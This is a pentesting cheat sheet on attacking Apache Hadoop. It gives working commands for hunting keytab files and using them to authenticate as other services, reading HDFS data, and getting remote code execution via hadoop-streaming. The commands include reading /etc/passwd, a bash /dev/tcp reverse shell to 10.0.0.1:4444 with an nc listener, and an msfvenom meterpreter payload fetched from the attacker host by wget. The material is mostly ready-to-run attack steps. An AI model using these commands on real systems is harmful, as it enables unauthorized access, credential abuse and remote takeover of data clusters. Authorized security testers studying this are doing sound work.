# Apache Hadoop Pentesting ## Apache Hadoop Pentesting Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default. ### Authenticate using Keytab Kyetab files are used to authenticate to the KDC (key distribution center) on Kerberos authentication. To find them, execute the following command in target system. ```shellscript find / -type f -name *.keytab 2>/dev/null ``` After finding them, we can use them to gather information or authenticate. ```shellscript # Gather information from a keytab # -k: Speicifed a keytab file klist -k /path/to/example.keytab # Authenticate to Kerberos server and request a ticket. # : it' stored in example.keytab. Run `klist -k example.keytab` to check it. # -k: Use a keytab # -V: verbose mode # -t : Filename of keytab to use kinit -k -V -t /path/to/example.keytab # e.g. kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab ``` #### Impersonate Another Hadoop Service We can authenticate other services by executing **`klist`** and **`kinit`**. Then we can investigate the HDFS service by the following HDFS commands. ### HDFS Commands #### Find HDFS Binary Path When authenticated, we need to find the path of the **`hdfs`** command associated with Hadoop. This command allows us to execute file system command in the datalake.\ If the path exists in the default PATH (confirm to run **`echo $PATH`**), we don't have to find them. However, if the path is not set in the default PATH, find it by running the following command. ``` find / -type f -name hdfs 2>/dev/null ``` If we find the path, go to the directory and use commands as below. #### HDFS Command Cheat Sheet Please refer to As mentioned above, if the **`hdfs`** path is not set in the PATH, we need to go to where the **`hdfs`** binary exists.\ Basically, their commands are similar to UNIX. ```shellscript hdfs dfs -help # List files in the hdfs service root. hdfs dfs -ls / # -R: Recursive hdfs dfs -ls /R / # Get the contents of the file hdfs dfs -cat /example.txt ``` ### RCE (Remote Code Execution) Reference: [https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools Techniques and Procedures/Executing remote commands](https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands) First we need to create arbitrary file that contains at lease one character. Then put it on HDFS. ```shellscript echo hello > /tmp/hello.txt hdfs dfs -put /tmp/hello.txt /tmp/hello.txt ``` Now execute below command to execute remote command.\ Note that the **`-output`** directory needs to be NOT exist, so if we want to multiple execute command, we have to delete the previous output folder or specify another name. ``` hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE ``` We can see the result of the command in the output directory. For example, ```shellscript hdfs dfs -ls /tmp/output hdfs dfs -cat /tmp/output/part-00000 ``` #### Reverse Shell In target machine, create a reverse shell script and put it on HDFS. ```shellscript echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' > /tmp/shell.sh hdfs dfs -put /tmp/shell.sh /tmp/shell.sh ``` In local machine, start a listener. ```shellscript nc -lvnp 4444 ``` Now execute the following command. ```shellscript # -mapper: The HDFS path of the shell.elf # -file: The system path of the shell.elf hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh" -background ``` We can get a shell in local machine. #### Reverse Shell (MsfVenom) First create a reverse shell payload using msfvenom in local machine and prepare a listener using msfconsole. ```shellscript msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf msfconsole msf> use exploit/multi/handler msf> set payload linux/x86/meterpreter/reverse_tcp msf> set lhost 10.0.0.1 msf> set lport 4444 msf> run ``` Transfer the payload to target machine. ```shellscript wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf # Put it on HDFS. hdfs dfs -put /tmp/shell.elf /tmp/shell.elf ``` Now execute the following command. ```shellscript # -mapper: The HDFS path of the shell.elf # -file: The system path of the shell.elf hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf" -background ``` We can get a shell in meterpreter so to spawn the OS shell, run **`shell`** command in the meterpreter.